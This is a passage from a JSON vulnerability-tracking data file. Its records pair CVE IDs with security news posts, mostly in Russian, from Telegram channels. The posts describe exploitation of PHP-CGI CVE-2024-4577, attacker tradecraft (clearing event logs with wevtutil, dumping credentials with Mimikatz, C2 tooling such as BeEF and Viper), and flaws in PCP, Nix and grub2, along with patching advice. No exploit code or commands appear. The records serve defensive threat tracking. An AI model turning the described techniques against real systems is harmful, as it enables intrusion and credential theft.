\u0441\u043e\u0437\u0434\u0430\u044e\u0442 \u0437\u0430\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 \u0438 \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u044e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0447\u0435\u0440\u0435\u0437 \u043f\u043b\u0430\u0433\u0438\u043d\u044b TaoWu.\n\n\u0427\u0442\u043e\u0431\u044b \u0441\u043a\u0440\u044b\u0442\u044c \u0441\u0432\u043e\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c, \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0441\u0442\u0438\u0440\u0430\u044e\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0436\u0443\u0440\u043d\u0430\u043b\u044b \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b wevtutil, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u0441\u043b\u0435\u0434\u044b \u0432\u043c\u0435\u0448\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430. \u0417\u0430\u0432\u0435\u0440\u0448\u0430\u044e\u0449\u0438\u0439 \u044d\u0442\u0430\u043f \u0430\u0442\u0430\u043a\u0438 \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434 Mimikatz \u0434\u043b\u044f \u043a\u0440\u0430\u0436\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u0438 NTLM-\u0445\u044d\u0448\u0435\u0439 \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b. \u0410\u043d\u0430\u043b\u0438\u0437 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 (C2), \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0430\u0442\u0430\u043a\u0435, \u043f\u043e\u043a\u0430\u0437\u0430\u043b, \u0447\u0442\u043e \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0441 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c\u0438 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0447\u0435\u0440\u0435\u0437 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442. \u042d\u0442\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u0440\u0430\u0437\u043c\u0435\u0449\u0451\u043d\u043d\u044b\u0435 \u043d\u0430 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 Alibaba Cloud, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0438 \u043f\u043e\u043b\u043d\u044b\u0439 \u043d\u0430\u0431\u043e\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432.\n\n\u0421\u0440\u0435\u0434\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0443\u0442\u0438\u043b\u0438\u0442 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c:\n\nBrowser Exploitation Framework (BeEF) \u2014 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0438\u0445 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435.\n\nViper C2 \u2014 \u043c\u043e\u0434\u0443\u043b\u044c\u043d\u044b\u0439 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u043e\u0431\u0440\u0430\u0442\u043d\u044b\u0445 \u043e\u0431\u043e\u043b\u043e\u0447\u0435\u043a Meterpreter.\n\nBlue-Lotus \u2014 JavaScript-\u0432\u0435\u0431\u0448\u0435\u043b\u043b \u0434\u043b\u044f XSS-\u0430\u0442\u0430\u043a, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u044b, \u043a\u0440\u0430\u0441\u0442\u044c cookie-\u0444\u0430\u0439\u043b\u044b, \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u043e\u0431\u0440\u0430\u0442\u043d\u044b\u0435 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u0438 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0442\u0435\u043d\u0442\u043e\u043c.\n\n\u041f\u043e \u043e\u0446\u0435\u043d\u043a\u0430\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u043e\u0432, \u0430\u0442\u0430\u043a\u0430 \u043d\u043e\u0441\u0438\u0442 \u0431\u043e\u043b\u0435\u0435 \u0441\u043b\u043e\u0436\u043d\u044b\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440, \u0447\u0435\u043c \u043f\u0440\u043e\u0441\u0442\u043e\u0435 \u043f\u043e\u0445\u0438\u0449\u0435\u043d\u0438\u0435 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. \u041f\u043e\u0441\u0442\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u0435 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0443\u0440\u043e\u0432\u043d\u044f SYSTEM \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u043b\u043e\u0436\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u044e\u0442 \u043e \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0435 \u043a \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c \u0431\u0443\u0434\u0443\u0449\u0438\u043c \u0430\u0442\u0430\u043a\u0430\u043c.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-03-07T07:13:25.000000Z"}, {"uuid": "76ab6f40-989c-4d53-9d0a-b5406fc8bb43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/itsec_news/5451", "content": "\u200b\u26a1\ufe0f79 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u0432 \u0430\u0442\u0430\u043a: PHP-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0430\u0435\u0442 \u043f\u043e\u043b\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u043c \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\n\n\ud83d\udcac \u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b GreyNoise \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438 \u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0438 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 PHP-CGI, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u043b\u0430 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u044f\u043f\u043e\u043d\u0441\u043a\u0438\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \u0410\u0442\u0430\u043a\u0438 \u0442\u0435\u043f\u0435\u0440\u044c \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0440\u0435\u0433\u0438\u043e\u043d\u043e\u0432, \u0442\u0440\u0435\u0431\u0443\u044f \u0441\u0440\u043e\u0447\u043d\u044b\u0445 \u043c\u0435\u0440 \u043f\u043e \u0437\u0430\u0449\u0438\u0442\u0435 \u043e\u0442 \u0443\u0433\u0440\u043e\u0437\u044b.\n\n\u041d\u0435\u0434\u0430\u0432\u043d\u043e Cisco Talos \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0430 \u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438, \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u043f\u0440\u043e\u0442\u0438\u0432 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u0432 \u042f\u043f\u043e\u043d\u0438\u0438. \u0412 \u0445\u043e\u0434\u0435 \u0430\u0442\u0430\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f RCE- \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHP-CGI CVE-2024-4577 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 9.8).\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 PHP-CGI \u043d\u0430 Windows-\u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f Cobalt Strike \u0438 \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0430\u0442\u0430\u043a \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u044f TaoWu. \u041e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0441\u0442\u0438\u043a\u0438 \u0430\u0442\u0430\u043a \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 HTTP POST-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0441 \u0445\u044d\u0448\u0435\u043c MD5 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0433\u043e \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f, \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 PowerShell-\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u0438 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 C2-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u043d\u0430 Alibaba Cloud.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c GreyNoise, \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u044b \u0430\u0442\u0430\u043a \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0448\u0438\u0440\u0435, \u0447\u0435\u043c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c. \u0412 \u044f\u043d\u0432\u0430\u0440\u0435 2025 \u0433\u043e\u0434\u0430 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u0431\u043e\u043b\u0435\u0435 1089 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432, \u043f\u044b\u0442\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442. \u0412\u0441\u0435\u0433\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e 79 \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0445 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445.\n\nGreyNoise \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0438 \u043e\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0440\u0435\u0433\u0438\u043e\u043d\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0421\u0428\u0410, \u0421\u0438\u043d\u0433\u0430\u043f\u0443\u0440, \u0412\u0435\u043b\u0438\u043a\u043e\u0431\u0440\u0438\u0442\u0430\u043d\u0438\u044e, \u0418\u0441\u043f\u0430\u043d\u0438\u044e \u0438 \u0418\u043d\u0434\u0438\u044e, \u0441 \u0437\u0430\u043c\u0435\u0442\u043d\u044b\u043c \u0443\u0432\u0435\u043b\u0438\u0447\u0435\u043d\u0438\u0435\u043c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0432 \u043a\u043e\u043d\u0446\u0435 \u044f\u043d\u0432\u0430\u0440\u044f. \u0411\u043e\u043b\u0435\u0435 43% \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0442\u0440\u0430\u0444\u0438\u043a\u0430 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u0438\u0437 \u0413\u0435\u0440\u043c\u0430\u043d\u0438\u0438 \u0438 \u041a\u0438\u0442\u0430\u044f. \u0412 \u0444\u0435\u0432\u0440\u0430\u043b\u0435 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0438\u0441\u044c \u043d\u043e\u0432\u044b\u0435 \u0432\u0441\u043f\u043b\u0435\u0441\u043a\u0438 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0447\u0442\u043e \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u0432 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0446\u0435\u043b\u0435\u0439.\n\nCVE-2024-4577 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0435\u0449\u0451 \u043b\u0435\u0442\u043e\u043c 2024 \u0433\u043e\u0434\u0430, \u043e\u0434\u043d\u0430\u043a\u043e \u0430\u0442\u0430\u043a\u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043b\u0438\u0441\u044c. \u041e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u0446\u0435\u043b\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u043b\u0430\u0441\u044c \u0432 \u043f\u043e\u0445\u0438\u0449\u0435\u043d\u0438\u0438 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u043c \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u0438 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0434\u043b\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0430\u0442\u0430\u043a. \u0412 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 \u0431\u044b\u043b\u0430 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0438\u0442\u0435\u0442 \u043d\u0430 \u0422\u0430\u0439\u0432\u0430\u043d\u0435. \u0422\u043e \u0435\u0441\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043d\u0430\u0447\u0430\u043b\u0430 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c\u0441\u044f \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u042f\u043f\u043e\u043d\u0438\u0438 \u0437\u0430\u0434\u043e\u043b\u0433\u043e \u0434\u043e \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f GreyNoise.\n\n\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u043c Windows-\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a PHP-CGI, \u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044f\u043c , \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0440\u0435\u0442\u0440\u043e\u0441\u043f\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0438 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 IP-\u0430\u0434\u0440\u0435\u0441\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-03-10T09:18:47.000000Z"}, {"uuid": "9e443529-2807-459e-9260-f176ec8cfe81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45770", "type": "seen", "source": "https://t.me/codeby_sec/8388", "content": "\u2753 \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0434\u0432\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Performance Co-Pilot (PCP). \u041f\u0435\u0440\u0432\u0430\u044f, CVE-2024-45770, \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439 pmpost \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root, \u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0435\u0441\u043b\u0438 \u0443 \u043d\u0438\u0445 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u0412\u0442\u043e\u0440\u0430\u044f, CVE-2024-45769, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 pcmd \u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430. \u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 PCP 6.3.1 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u043e\u0431\u0430 \u0440\u0438\u0441\u043a\u0430.\n\n\u23fa\ufe0f\u0422\u0430\u043a\u0436\u0435 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Nix (CVE-2024-45593), \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0430\u044f \u0430\u0440\u0445\u0438\u0432\u044b NAR \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u043b\u0438 \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 Nix 2.24.6.\n\n\ud83c\udf1a \u041e\u0431\u043d\u043e\u0432\u043b\u044f\u0439\u0442\u0435\u0441\u044c, \u0447\u0442\u043e\u0431\u044b \u043e\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b.", "creation_timestamp": "2024-09-26T10:10:56.000000Z"}, {"uuid": "c927437d-7d0f-468c-91d4-5b58707bcc62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45776", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7251", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45776\n\ud83d\udd25 CVSS Score: 6.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: When reading the language .mo file in grub_mofile_open(), grub2 fails to verify an integer overflow when allocating its internal buffer. A crafted .mo file may lead the buffer size calculation to overflow, leading to out-of-bound reads and writes. This flaw allows an attacker to leak sensitive data or overwrite critical data, possibly circumventing secure boot protections.\n\ud83d\udccf Published: 2025-02-18T19:25:45.929Z\n\ud83d\udccf Modified: 2025-03-11T21:58:07.603Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-45776\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2339182", "creation_timestamp": "2025-03-11T22:39:51.000000Z"}, {"uuid": "adefe66e-c403-47a6-a9c5-f16b085f248e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45774", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7252", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-45774\n\ud83d\udd25 CVSS Score: 6.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. A specially crafted JPEG file can cause the JPEG parser of grub2 to incorrectly check the bounds of its internal buffers, resulting in an out-of-bounds write. The possibility of overwriting sensitive information to bypass secure boot protections is not discarded.\n\ud83d\udccf Published: 2025-02-18T18:25:09.511Z\n\ud83d\udccf 